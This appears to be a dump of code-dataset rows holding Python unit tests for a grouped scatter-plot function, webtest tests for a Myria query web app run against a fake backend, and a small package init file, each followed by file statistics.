save_to='{}test_group_scatter_3'.format(self.save_path)))
def test_4_scatter_two_groups_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
save_to='{}test_group_scatter_4'.format(self.save_path)))
def test_5_scatter_three_groups_highlight_two(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = [1] * 100 + [2] * 100 + [3] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2, 3],
save_to='{}test_group_scatter_5'.format(self.save_path)))
def test_6_scatter_two_groups_highlight_one_no_points(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
points=False, save_to='{}test_group_scatter_6'.format(self.save_path)))
def test_7_scatter_two_groups_highlight_one_no_fit(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
fit=False, save_to='{}test_group_scatter_7'.format(self.save_path)))
def test_8_scatter_two_groups_highlight_one_scalar_num(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=2,
save_to='{}test_group_scatter_8'.format(self.save_path)))
def test_9_scatter_two_groups_string_names_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=['b'],
save_to='{}test_group_scatter_9'.format(self.save_path)))
def test_10_scatter_three_groups_string_names_highlight_scalar_string(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight='bc',
save_to='{}test_group_scatter_10'.format(self.save_path)))
def test_11_scatter_three_groups_invalid_highlight_groups(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
highlight=['z', 'y', 'x'],
save_to='{}test_group_scatter_11'.format(self.save_path)))
def test_12_scatter_two_groups_no_boxplot_borders(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
boxplot_borders=False,
save_to='{}test_group_scatter_12'.format(self.save_path)))
def test_13_scatter_two_groups_title(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
title='Title Test', save_to='{}test_group_scatter_13'.format(self.save_path)))
def test_14_scatter_two_groups_labels(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], xname='Test x',
yname='Test y', save_to='{}test_group_scatter_14'.format(self.save_path)))
def test_15_scatter_three_groups_auto_named(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'],
save_to='{}test_group_scatter_15'.format(self.save_path)))
def test_16_scatter_one_group_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
grp = ['a'] * 100
input_array = pd.DataFrame({'a': input_1_x, 'b': input_1_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_16'.format(self.save_path)))
def test_17_scatter_three_groups_vector_input_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = Vector(cs_x, other=cs_y, groups=grp)
self.assertTrue(GraphGroupScatter(input_array, save_to='{}test_group_scatter_17'.format(self.save_path)))
def test_18_scatter_three_groups_vector_input_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = Vector(cs_x, other=cs_y, groups=grp)
self.assertTrue(GraphGroupScatter(input_array, highlight=['b'],
save_to='{}test_group_scatter_18'.format(self.save_path)))
def test_19_scatter_one_group_matplotlib_bug(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=3)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
grp = ['a'] * 3
input_array = pd.DataFrame({'a': input_1_x, 'b': input_1_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_19'.format(self.save_path)))
def test_20_scatter_two_groups_matplotlib_bug(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=4)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 4 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_20'.format(self.save_path)))
def test_21_scatter_two_groups_unequal_x_and_y_size(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x if x > 0.0]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x if x > 0.0]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
self.assertRaises(UnequalVectorLengthError, lambda: GraphGroupScatter(cs_x, cs_y, groups=grp))
def test_22_scatter_two_groups_wrong_group_size(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1, 2]
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
self.assertRaises(UnequalVectorLengthError, lambda: GraphGroupScatter(cs_x, cs_y, groups=grp))
def test_23_no_data(self):
"""Test the case where there's no data."""
self.assertRaises(NoDataError, lambda: GraphGroupScatter([], []))
def test_24_scatter_three_groups_different_sizes(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=1)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=10)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 1 + ['b'] * 10 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_24'.format(self.save_path)))
def test_25_scatter_two_groups_no_ydata(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertRaises(AttributeError, lambda: GraphGroupScatter(input_array['a'], groups=input_array['c']))
def test_26_scatter_three_groups_long_group_names(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['11111111111111111111'] * 100 + ['222222222222222222222'] * 100 + ['3333333333333333333333'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_26'.format(self.save_path)))
def test_27_scatter_two_groups_negative_corr(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [2 - (x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_27'.format(self.save_path)))
def test_28_scatter_two_groups_labels(self):
"""Test the case where labels are provided."""
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_labels_array = np.random.choice(list('ABCDE'), size=200)
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(
GraphGroupScatter(
input_array['a'],
input_array['b'],
groups=input_array['c'],
labels=input_labels_array,
highlight=['A'],
save_to='{}test_group_scatter_28'.format(self.save_path)
)
)
def test_29_scatter_two_groups_labels_and_group_highlight(self):
"""Test the case where labels and groups are highlighted."""
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_labels_array = np.random.choice(list('ABCDE'), size=220)
grp = [1] * 110 + [2] * 110
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
indices_x = list(np.random.randint(0, 199, 20))
indices_y = list(np.random.randint(0, 199, 20))
for i in indices_x:
cs_x = np.insert(cs_x, i, np.nan, axis=0)
for i in indices_y:
cs_y = np.insert(cs_y, i, np.nan, axis=0)
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(
GraphGroupScatter(
input_array['a'],
input_array['b'],
groups=input_array['c'],
labels=input_labels_array,
highlight=[1],
save_to='{}test_group_scatter_29'.format(self.save_path)
)
)
def test_30_groupscatter_dataframe(self):
"""Tests graphscater with dataframe input."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=['A'],
save_to='{}test_group_scatter_30'.format(self.save_path)
)
)
def test_31_groupscatter_labels_no_highlight(self):
"""Test the case where labels are given, but no highlights specified."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
save_to='{}test_group_scatter_31'.format(self.save_path)
)
)
def test_32_groupscatter_labels_invalid_labels_and_groups(self):
"""Test the case where all the highlights are not in groups or labels."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=['XX', 2, 34],
save_to='{}test_group_scatter_32'.format(self.save_path)
)
)
def test_33_groupscatter_labels_individual_highlight(self):
"""Test the case where individual points are highlighted with one overrunning."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.randint(10000, 50000, size=100)
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=df[df['x'] > 2]['labels'].tolist(),
save_to='{}test_group_scatter_33'.format(self.save_path)
)
)
def test_34_groupscatter_labels_individual_no_borders(self):
"""Test the case where individual points are highlighted with one overrunning and no boxplot borders."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.randint(10000, 50000, size=100)
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
boxplot_borders=False,
groups=df['groups'],
labels=df['labels'],
highlight=df[df['x'] > 2]['labels'].tolist(),
save_to='{}test_group_scatter_34'.format(self.save_path)
)
)
if __name__ == '__main__':
unittest.main()
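# --- Illustrative helper sketch (added commentary, not part of the original test module) ---
# Most tests above repeat the same seeded two-group data construction; if the suite were
# refactored, that setup could be factored into a helper like the commented sketch below
# (the helper name and parameters are hypothetical).
#
# def make_two_group_frame(n=100, seed=987654321):
#     np.random.seed(seed)
#     x1 = st.norm.rvs(size=n)
#     y1 = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in x1]
#     x2 = st.norm.rvs(size=n)
#     y2 = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in x2]
#     return pd.DataFrame({'a': np.concatenate((x1, x2)),
#                          'b': np.concatenate((y1, y2)),
#                          'c': [1] * n + [2] * n})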
| 52.92233 | 120 | 0.583636 | 4,416 | 27,255 | 3.324502 | 0.042799 | 0.057217 | 0.077243 | 0.061985 | 0.877733 | 0.848852 | 0.791704 | 0.765888 | 0.765888 | 0.765888 | 0 | 0.080473 | 0.259108 | 27,255 | 514 | 121 | 53.025292 | 0.646561 | 0.017685 | 0 | 0.708155 | 0 | 0 | 0.046087 | 0.028094 | 0 | 0 | 0 | 0 | 0.072961 | 1 | 0.075107 | false | 0 | 0.019313 | 0 | 0.103004 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4e7c2e4e61d7c943710324f007049a67f028244 | 4,442 | py | Python | appengine/test/test_myria_down.py | CSE512-15S/a3-haynesb-Pending | 881c3872304f2cd796bd4db7211ab8c3f108586b | ["Apache-2.0"] | 2 | 2015-05-04T21:52:06.000Z | 2015-07-25T05:53:27.000Z | appengine/test/test_myria_down.py | CSE512-15S/a3-haynesb-Pending | 881c3872304f2cd796bd4db7211ab8c3f108586b | ["Apache-2.0"] | null | null | null | appengine/test/test_myria_down.py | CSE512-15S/a3-haynesb-Pending | 881c3872304f2cd796bd4db7211ab8c3f108586b | ["Apache-2.0"] | null | null | null |
from nose.tools import assert_equals
from webtest import TestApp
from myria_web_main import Application
app = TestApp(Application(hostname='fake.fake', port=12345))
def test_redirect():
response = app.get('/')
assert_equals(response.status_code, 301)
assert response.headers['Location']
assert response.headers['Location'].endswith('/editor')
def test_editor_loads():
response = app.get('/editor')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_queries_loads():
response = app.get('/queries')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_datasets_loads():
response = app.get('/datasets')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_datalog_logical():
params = {'language': 'datalog',
'query': 'A(x) :- R(x,3)'}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_myrial():
params = {'language': 'myrial',
'query': '''R = Empty(x:int, y:int);
Ans = [FROM R WHERE y=3 EMIT x ];
STORE(Ans, justx);'''}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert response.json
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_sql():
params = {'language': 'sql',
'query': '''R = Empty(x:int, y:int);
Ans = SELECT x FROM R WHERE y=3;
STORE(Ans, justx);'''}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert response.json
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_dot_datalog():
# Datalog logical
params = {'language': 'datalog',
'type': 'logical',
'query': 'A(x) :- R(x,3)'}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_dot_myrial():
# Myrial logical
params = {'language': 'myrial',
'type': 'logical',
'query': '''R = Empty(x:int, y:int);
Ans = [FROM R WHERE y=3 EMIT x];
STORE(Ans, justx);'''}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_dot_sql():
# SQL logical
params = {'language': 'sql',
'type': 'logical',
'query': '''R = Empty(x:int, y:int);
Ans = SELECT x FROM R WHERE y=3;
STORE(Ans, justx);'''}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_datalog_execute():
params = {'language': 'datalog',
'query': 'A(x) :- R(x,3)'}
response = app.post('/execute', params, expect_errors=True)
assert_equals(response.status_code, 503)
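# --- Note on the fixture above (added commentary, not original code) ---
# Every test runs against an unreachable backend ('fake.fake:12345'): the page routes
# (/editor, /queries, /datasets) are expected to render the connection error, the
# translation routes (/plan, /optimize, /compile, /dot) still return 200 because they do
# not appear to need the backend, and only /execute, which must reach a live server,
# returns 503.  Adding another case follows the same pattern, e.g. (illustrative only):
#
# def test_dot_datalog_physical_only():
#     params = {'language': 'datalog', 'type': 'physical',
#               'query': 'A(x) :- R(x,3)'}
#     response = app.get('/dot', params)
#     assert_equals(response.status_code, 200)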
| 32.188406 | 65 | 0.61909 | 536 | 4,442 | 5.001866 | 0.13806 | 0.12085 | 0.149198 | 0.193957 | 0.802313 | 0.761656 | 0.761656 | 0.761656 | 0.761656 | 0.757926 | 0 | 0.025506 | 0.232103 | 4,442 | 138 | 66 | 32.188406 | 0.760481 | 0.01756 | 0 | 0.764706 | 0 | 0 | 0.262965 | 0 | 0 | 0 | 0 | 0 | 0.392157 | 1 | 0.107843 | false | 0 | 0.029412 | 0 | 0.137255 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f20c43028037a701a3e0a324301b2de33979da15 | 62 | py | Python | tools/logger/trace_db/__init__.py | ti-simplelink/swol | 331fd1096c643297505da010aff979f6c7baf02b | ["BSD-3-Clause"] | 5 | 2020-04-16T00:38:14.000Z | 2022-02-10T12:47:14.000Z | tools/logger/trace_db/__init__.py | ti-simplelink/swol | 331fd1096c643297505da010aff979f6c7baf02b | ["BSD-3-Clause"] | null | null | null | tools/logger/trace_db/__init__.py | ti-simplelink/swol | 331fd1096c643297505da010aff979f6c7baf02b | ["BSD-3-Clause"] | 1 | 2020-04-27T21:47:17.000Z | 2020-04-27T21:47:17.000Z |
from .trace_db import TraceDB
from .trace_db import ElfString
| 20.666667 | 31 | 0.83871 | 10 | 62 | 5 | 0.6 | 0.36 | 0.44 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 62 | 2 | 32 | 31 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
